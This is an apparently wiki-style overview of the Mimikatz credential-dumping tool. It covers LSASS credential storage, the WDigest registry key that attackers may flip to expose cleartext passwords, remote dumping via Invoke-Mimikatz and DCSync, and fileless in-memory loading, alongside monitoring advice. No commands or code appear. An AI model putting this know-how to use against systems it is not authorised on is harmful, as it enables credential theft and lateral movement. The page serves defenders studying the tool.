Mimikatz
Mimikatz Overview
Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy, first created in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG).
Mimikatz requires administrator or SYSTEM rights and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested).
Mimikatz & Credentials
After a user logs on, a variety of credentials are generated and stores in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn't prompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication among others.
In order to prevent a clear-text password from being placed in LSASS, the following registry key needs to be set to "0" (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
: "UserLogonCredential"(DWORD)
This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces "clear-text" passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows8.1/2012 R2 and newer do not have a "UseLogonCredential" DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.
Running Mimikatz Remotely
Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This includes running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft's Domain Controller official replication APIs, once the correct rights are attained).
PowerShell and Mimikatz
The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Fromework) through the "Invoke-Mimikatz" PowerShell script which leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.
What gives Invoke-Mimikatz its "magic" is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet and executed from memory without anything touching the disk. Futhermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date.
Last updated